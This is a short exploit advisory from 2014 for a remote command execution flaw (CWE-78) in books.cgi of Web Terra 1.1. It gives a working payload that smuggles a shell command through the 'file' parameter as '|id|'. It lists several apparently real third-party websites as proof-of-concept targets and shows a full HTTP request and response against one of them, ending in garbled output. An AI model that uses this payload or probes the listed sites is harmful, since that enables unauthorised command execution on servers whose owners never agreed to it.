[+] Remote Comand Execution on books.cgi Web Terra v. 1.1 [+] Date: 21/05/2014 [+] CWE number: CWE-78 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra [+] Vulnerable File: books.cgi [+] Version : 1.1 [+] Exploit: http://host/patch/books.cgi?file=|id| [+] PoC: http://redsuns.x0.com/webnovel/books.cgi?file=|id| http://home.kinet.or.jp/yama/cgi-bin/books/books.cgi?file=|id| http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file=|id| [+] Example Request: GET /webnovel/books.cgi?file=|id| HTTP/1.1 Host: redsuns.x0.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 21 May 2014 18:59:05 GMT Server: Apache/1.3.42 (Unix) Connection: close Content-Type: text/html Content-Length: 498
| ??M??
|| ??????
|| ?ύX?
|| ?????
|